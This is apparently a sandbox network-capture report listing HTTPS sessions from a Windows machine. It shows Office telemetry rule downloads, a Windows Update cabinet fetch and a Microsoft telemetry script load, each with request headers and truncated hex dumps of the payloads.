                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              123192.168.2.104984713.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:17 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                              x-ms-request-id: 629a3d73-e01e-0052-0991-3fd9df000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153217Z-174f7845968xr5c2hC1EWRd0hn0000000dzg00000000be2a
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              124192.168.2.104984952.149.20.212443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TxBTEvPUg8ROmxr&MD=Lngvz3xX HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                              MS-CorrelationId: 3476bd23-c89e-41a7-9e04-e36d6cbfb942
                                                                                                                                                                                                                                                              MS-RequestId: d8648cb0-36a9-48c3-be43-d7547a83cc98
                                                                                                                                                                                                                                                              MS-CV: lTR800Ou0USVYd8q.0
                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:17 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 30005
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              125192.168.2.104985013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:17 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                              x-ms-request-id: 8e52d6ec-701e-0050-6436-406767000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153217Z-174f7845968l4kp6hC1EWRe8840000000x9000000000nxeu
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              126192.168.2.104985113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                              x-ms-request-id: 8b39fd45-d01e-0065-5791-3fb77a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153218Z-174f7845968g6hv8hC1EWR1v2n00000004y000000000qxg5
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              127192.168.2.104985213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:17 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:18 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                              x-ms-request-id: a56f9727-801e-0035-2f31-40752a000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153218Z-174f7845968qj8jrhC1EWRh41s0000000x1g00000000ev6a
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:18 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              128192.168.2.104985513.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                              x-ms-request-id: b0621631-101e-008e-3d91-3fcf88000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153219Z-174f784596886s2bhC1EWR743w0000000x2g00000000megc
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              129192.168.2.104986023.52.182.8443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Server: Kestrel
                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                              X-OSID: 2
                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                              X-CCC: GB
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=125277
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:19 GMT
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              130192.168.2.104985813.107.246.634434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                                                                              Host: js.monitor.azure.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                              Referer: https://learn.microsoft.com/
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:32:19 GMT
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 207935
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                                                                              ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                                                                              x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                              x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                                                                              x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153219Z-174f7845968cpnpfhC1EWR3afc0000000wv0000000002xvb
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:32:19 UTC15516INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                                                                              Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
